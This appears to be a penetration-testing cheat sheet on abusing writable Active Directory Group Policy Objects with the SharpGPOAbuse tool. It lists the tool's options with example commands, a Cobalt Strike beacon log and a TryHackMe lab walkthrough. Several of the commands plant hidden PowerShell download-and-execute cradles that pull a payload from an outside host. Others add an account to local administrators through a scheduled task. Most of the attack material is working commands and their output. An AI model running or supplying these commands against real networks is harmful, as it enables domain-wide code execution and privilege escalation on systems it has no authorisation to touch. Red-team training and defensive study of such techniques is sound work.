Options required to add new user rights:--UserRights Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.--UserAccount Set the account to add the new rights.--GPOName The name of the vulnerable GPO.Example: SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
Options required to add a new local admin:--UserAccount Set the name of the account to be added in local admins.--GPOName The name of the vulnerable GPO.Example: SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
Options required to add a new user or computer startup script:--ScriptName Set the name of the new startup script.--ScriptContents Set the contents of the new startup script.--GPOName The name of the vulnerable GPO.Example: SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:
Options required to add a new computer or user immediate task:--TaskName Set the name of the new computer task.--Author Set the author of the new task (use a DA account).--Command Command to execute.--Arguments Arguments passed to the command.--GPOName The name of the vulnerable GPO.Additional User Task Options:--FilterEnabled Enable Target Filtering for user immediate tasks.--TargetUsername The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>--TargetUserSID The targeted user's SID.Additional Computer Task Options:--FilterEnabled Enable Target Filtering for computer immediate tasks.--TargetDnsName The DNS name of the computer to target. The malicious task will run only on the specified host.Example: SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"[+] host called home, sent: 171553 bytes[+] received output:[+] Domain = europa.com[+] Domain Controller = EURODC01.europa.com[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml[+] versionNumber attribute changed successfully[+] The version number in GPT.ini was increased successfully.[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.[+] Done!
If we have GenericWrite privileges on the SECURITY-POL-VN GPO, SharpGPOAbuse or PowerView can be used to abuse these privileges and create a malicious scheduled task.
PS C:\enterprise-share> net user enterprise-securitynet user enterprise-securityUser name enterprise-securityFull Name Enterprise SecurityComment TryHackMeUser's comment Country/region code 000 (System Default)Account active YesAccount expires NeverPassword last set 2/23/2021 4:01:37 PMPassword expires NeverPassword changeable 2/24/2021 4:01:37 PMPassword required YesUser may change password YesWorkstations allowed AllLogon script User profile Home directory Last logon 8/4/2021 1:08:48 PMLogon hours allowed AllLocal Group Memberships Global Group memberships *Domain Users The command completed successfully.
PS C:\enterprise-share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN".\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"[+] Domain = vulnnet.local[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml[+] versionNumber attribute changed successfully[+] The version number in GPT.ini was increased successfully.[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.[+] Done!PS C:\enterprise-share> gpupdate /forcegpupdate /forceUpdating policy...Computer Policy update has completed successfully.User Policy update has completed successfully.
PentOpsVault